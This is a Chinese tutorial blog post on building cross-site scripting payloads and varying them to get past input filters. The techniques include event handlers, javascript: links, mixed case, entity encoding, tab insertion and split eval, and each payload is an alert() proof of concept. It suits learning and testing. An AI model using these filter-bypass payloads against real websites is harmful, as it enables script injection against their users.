XSS的构造与变形

最新推荐文章于 2025-07-22 16:52:23 发布
原创 最新推荐文章于 2025-07-22 16:52:23 发布 · 1.3k 阅读 · 4 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#xss
本文深入解析了XSS(跨站脚本)攻击,包括其在OWASP TOP10中的地位,详细介绍了XSS的四种构造方法及六种变形手段,如利用<>构造HTML/JS、伪协议、事件触发等,以及大小写转换、引号使用等变形技巧。

※XSS:

XSS 是OWASP TOP10之一的漏洞,被称为跨站脚本攻击,是发生在服务器的漏洞,

常出现于微博、留言板、聊天室等手机用户输入的地方,都有可能被注入XSS代码。

※XSS的构造(现在有三种方法)

1.利用<>构造HTML/JS

在测试页面,提交参数<script>alert(xss)</script>

2.伪协议

使用JavaScript:伪协议的方式构造XSS

在测试页面:提交参数 <a href="javascript:alert(/xss/)"> hi!</a>

点击后弹出弹窗

3.产生自己的事件

在网页中发生很多事件,比如鼠标移动,键盘输入等,JS可以对这些事件进行响应,所以我们可以通过事件触发JS函数从而触发XSS.

 如输入<img src='./smile.jpg' onmouseover='alert(/xss/)'>时这个标签会引入一个图片,然后鼠标悬停在图片上的时候,会触发XSS 代码。
 
单行文本框的键盘点击事件,<input type="text" onkeydown="alert(/xss/)">,当点击键盘任意一个按键的时候出发。

4. 其他标签以及手法(H5)
    <svg onload="alert(/xss/)">

 <input onfocus=alert(/xss/) autofocus>

================================================================================================

※XSS的变形(六种)

1. 大小写转换

  可以将payload 进行大小写转化。如:

<Img sRc='#' Onerror="alert(/xss/)" />

<a hREf="javaScript:alert(/xss/)">click me</a>

 2. 引号的使用---HTML 语言中对引号的使用不敏感.如“
<img src='#' onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/) />

3. ' /'代替空格 可以利用左斜线代替空格
<Img/sRc='#'/Onerror='alert(/xss/)' />

4. 回车我们可以在一些位置添加Tab(水平制表符)和回车符,来绕过关键字检测。
<A hREf="j
avas    cript:alert(/xss/)">click me!</a>

5.  对标签属性值进行转码
    可以对标签属性值进行转码,用来绕过过滤。
如:<A hREf="j&#97;v&#x61;script:alert(/xss/)">click me!</a>

6. 拆分跨站
    <script>z='alert'</script>
    <script>z=z+'(/xss/)'</script>
    <script>eval(z)</script>


 

 

奇怪的569
关注
XSS漏洞-02】XSS构造变形及防御
cc
02-11 5818
简单来说,输入验证就是对用户提交的信息进行有效验证,仅接受指定长度范围内的,采用适当格式的内容提交,阻止或者忽略除此之外的其他任何数据。例子中包含两种语言,HTML语言JS语言,其中HTML语言对大小写不敏感,也就是说无论是大小写,该语言都认为是同一个函数,而。HTML语言中对引号的使用不敏感,但是某些过滤函数对引号则是“锱铢必较”,因此我们可以使用不同引号来闭合XSS语句。因此在XSS漏洞的防范上,一般会采用"对输入进行过滤"和"输出进行转义"的方式进行处理。可以对标签属性值进行转码,用来绕过过滤。
XSS】payload 常用构造变形方法
吉吉的博客
03-06 7179
XSS 相关 payload 构造变形的常用方法。
XSS变形突破
mdp1234的博客
07-29 1518
XSS变形 1. 大小写转换 可以将payload 进行大小写转化。如: <Img sRc='#' Onerror="alert(/xss/)" /> <a hREf="javaScript:alert(/xss/)">click me</a> 2. 引号的使用---HTML 语言中对引号的使用不敏感.如“ <img src='#' οnerrοr='alert(/xss/)'/> <img src=# οnerrοr=alert(/x..
XSS 跨站点脚本漏洞详解
一个努力学习网安的小牛马
11-09 557
xss攻击手法以及绕过防御
反射型XSS、存储型XSS和DOM型XSS的简介及XSS常见payload构造变形
bwxzdjn的博客
03-21 6169
用实验案例的形式记录学习三大常见的跨站脚本攻击:反射型XSS、存储型XSS和DOM型XSS,借此来掌握XSS攻击的基础知识。还有几种payload的构造以及变形来绕过一些简单的过滤。
XSS漏洞利用的构造方法,变形方式,Shellcode的调用
weixin_47306547的博客
09-28 2509
XSS的四种构造方法 1.利用 <> 构造HTML/JS 可以利用 <> 构造 HTML 标签和 <script> 标签 在测试页面提交参数 <h1 style='color:red'>利用 <> 构造 HTML/JS </h1> 提交 <script> alert(/xss/) </script> 2.伪协议 可以使用 jacasc...
XSS 语句的构造
千寻的博客
01-02 1919
XSS 语句的构造 [第一节]利用[<>]构造HTML/JS [第二节]伪协议—使用javascript: 伪协议的方式构造XSS [第三节]产生自己的事件 [第四节] XSS变形 [第五节]其他标签以及手法 [第六节]利用CSS 跨站(old) 第一节 利用[<>]构造HTML/JS 可以利用[<>] 构造HTML 标签和<script> 标...
OWASP TOP 10(二)XSS漏洞(概述、PoC、分类、构造变形绕过、XSS-Filter、xsser、xsstrike)
Pluto.的博客
12-15 3049
文章目录OWASP Top 10XSS一、概述二、XSS危害三、XSS相关四、使用PoC代码简单验证XSS漏洞五、XSS分类1. 反射型XSS2. 存储型XSS3. DOM型XSS六、XSS构造1. 利用<>构造HTML或JS标签2. 伪协议3. 事件驱动七、XSS变形1. 大小写转换2. 引号的使用3. 利用左斜线代替空格4. 添加Tab或回车符5. 对标签属性值进行转码6. 拆分跨站7. 双写绕过XSS练习平台 OWASP Top 10 XSS 一、概述 XSS被称为跨站脚本攻击(Cro
渗透测试实例指南--XSS进阶
qq_37051023的博客
11-02 411
1、XSS构造方法 1.1 利用<>构造HTML标签和<script> 例如:<script>alert(/xss/)</script> <script>confirm("完成的不错!")</script> <script>prompt("完成的不错!")</script> <scr...
XSS讲解下(web安全入门11)
黑战士的博客
05-15 2411
一、XSS构造 1.1 利用[<>]构造 HTML/JS 可以利用[<>]构造 HTML 标签和] 1.2 伪协议 亦可以使用 JavaScript:伪协议的方式构造 XSS 在 IE 浏览器的地址栏中输入[javascript:alert(/XSS/);],弹框成功 提交参数[click me!] 点击超链接。即可触发 XSS 也可使用 img 标签的伪协议,但这种方法只在 IE6 下测试成功 [<img src="javascript:alert(/XSS/)">
20、XSS——XSS跨站脚本
qq_55202378的博客
12-07 616
XSS被称为跨站脚本攻击(Cross-site scripting),由于和CSS(Cascading Style Sheets)重名,所以改为XSSXSS主要基于javascript语言完成恶意的攻击行为,因为javascript可以非常灵活的操作html、css和浏览器。XSS就是指通过利用网页开发时留下的漏洞(由于web应用程序对用户的输入过滤不足),巧妙的将恶意代码注入到网页中,使用户浏览器加载并执行攻击者制造的恶意代码,以达到攻击的效果。
XSS漏洞概述及使用
一颗小松子.的博客
01-23 1756
XSS 漏洞概述 简介 XSS作为OWASP TOP 10 之一 XSS被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(Cascading Style Sheets,层叠样式脚本)重名, 所以更名为XSSXSS(跨站脚本攻击) 主要基于javascript (JS) 完成恶意的攻击行为。 JS可以非常灵活的操作html,css和浏览器,这使得XSS攻击的"想象"空间特别大。 XSS通过将精心构造的代码(JS)代码注入到网页中,并由浏览器解释运
XSS -- 三种基本漏洞 (浅谈)
thj_blog
11-13 7504
一、  XSS 漏洞的验证         我们可以用一段简单的代码,验证和检测漏洞的存在,这样的代码叫做PoC(Proof of Concept)。验证XSS 漏洞存在的PoC 如下:               (1)&lt;script&gt;alert(/xss/)&lt;/script&gt;                      (2)&lt;script&gt;confirm('...
[渗透测试] XSS跨站点脚本攻击 零基础入门教程
Da1NtY的博客
10-15 1466
跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击。攻击者在合法的网站或Web应用程序中执行恶意脚本。当Web应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSSXSS主要使用JS来执行恶意攻击,因为JS可以操控HTML、CSS、浏览器等,所有就给了攻击者可乘之机。
浏览器的安全机制\ XSS
Chenamao的博客
08-02 962
浏览器的安全机制\ XSS 目录 浏览器的安全机制\ XSS 同源策略 SOP(sam Origin Policy) img 标签: iframe框架 AJAX: 同源策略条件 跨资源共享: HTTP头部声明 CSP(content security policy) XSS 跨站脚本攻击 (Cross Site Scripting)。 XSS漏洞的危害 Xss 漏洞的验证 XXS漏洞的分类 XXS的构造 固定会话攻击防御 *利用XSS漏洞如何获取数据? XSS变形
网络安全笔记-99-渗透-XSS
wwxxee
01-05 1345
XSS跨站脚本攻击 XSS(Cross-Site Scripting)。是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会收到影响 危害: 盗取用户账号 窃取用户cookie 劫持用户会话 刷流量,执行弹窗广告 传播蠕虫病毒 … 分类 反射型 ​ 非持久型的,参数型跨站脚本。用户访问恶意链接,客户端浏览器执行恶意代码。 ​ 一般容易出现在搜索框,输入框,url参数中 存储型 ​ 持久性的,恶意代码被写进数据库或文件永久保存。
XSS漏洞
weixin_54475242的博客
03-20 714
XSS漏洞 XSS漏洞 十大漏洞之一 Xss被称为跨站脚本攻击,xss通过将精心构造的代码(JS)代码注入到网页,并由浏览器解释运行这段JS代码,达到恶意攻击的效果。当用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来。用户浏览器就会解析这段XSS代码,也就是说用户被攻击了。 XSS的对象是用户和浏览器。微博,留言板,聊天室等等收集用户输入的地方,都有可能被注入XSS代码,都存在遭受XSS的风险,只要没有对用户的输入进行严格过滤,就会被XSS。 攻击者将恶意代码注入到服务器中 用户在没有防备的情况下
049 xss跨站脚本攻击一
鸡蛋炒鸡蛋
03-04 2156
文章目录一:XSS漏洞概述二:危害三:XSS漏洞的验证四:XSS的分类五:xss构造5.1:利用<>构造html/js5.2:伪协议5.3:产生自己的事件5.4:其他标签以及手法六:xss变形6.1:大小写转换6.2:引号的使用6.3:/ 代替空格6.4:回车6.5:对标签属性值进行转码6.6:拆分跨站6.7:双写绕过七:css中的变形 一:XSS漏洞概述 XSS做为OWASP TOP 10之一,XSS被称为跨站脚本攻(Cross-site scripting),本来应该缩写为CSS,但是由
[渗透测试] XSS跨站点脚本攻击 零基础入门教程(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
07-22 1166
​ 跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击。攻击者在合法的网站或Web应用程序中执行恶意脚本。当Web应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS。​ XSS主要使用JS来执行恶意攻击,因为JS可以操控HTML、CSS、浏览器等,所有就给了攻击者可乘之机。
xss绕过空格符号_xss变形--如何绕过xss过滤
weixin_39799561的博客
12-22 1422
我们可以通过构造xss代码进行各种变形,以绕过xss过滤器的检测1.大小写检测将payload进行大小写转化如click me2.引号的使用不断尝试双引号,单引号,没有引号如3.用[/]代替空格可以用左斜线来代替空格4.回车在一些位置添加Tab(水平制表符)和回车符,来绕过关键字检测如click me!5.对标签属性值进行转写如字母 ASCII码 十进制编码 十六进制编码a...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值